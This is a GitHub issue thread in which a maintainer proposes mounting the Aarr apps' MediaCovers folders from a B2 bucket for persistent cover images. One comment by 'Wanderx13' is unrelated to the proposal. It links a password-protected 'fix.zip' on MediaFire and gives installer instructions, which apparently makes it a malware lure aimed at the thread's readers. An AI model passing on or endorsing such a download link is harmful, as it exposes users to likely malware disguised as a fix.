### ISSUE TITLE
[suggestion] move Aarr mediacovers folders to B2 bucket

### ISSUE THREAD

**Issue by funkypenguin** [elfhosted/enhancements#23]
### 🤪 Sanity check

- [X] I have searched and confirmed no existing [open](https://github.com/elfhosted/enhancements/issues?q=is%3Aissue) / [closed](https://github.com/elfhosted/enhancements/issues?q=is%3Aissue+is%3Aclosed) issues, or [open](https://github.com/elfhosted/enhancements/pulls?q=is%3Apr) / [closed](https://github.com/elfhosted/enhancements/pulls?q=is%3Apr+is%3Aclosed) PRs exist for this app

### 🤕 What's not right?

We previously made the Aarrs' `MediaCovers` folders ephemeral, to avoid massive overusage of data. It might make more sense just to mount these folders from a big B2 bucket, so that the images can persist (better UX), but not consume precious local/network storage space.

### 🤯 Here's my idea!

Mount the 'MediaCovers` folder from a B2 bucket

### 🤔 On the other hand..

We'll want to test how responsive these are

### 🤩 But will it fly?

TBD

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by funkypenguin** [comment]
Tried this, was too slow :(
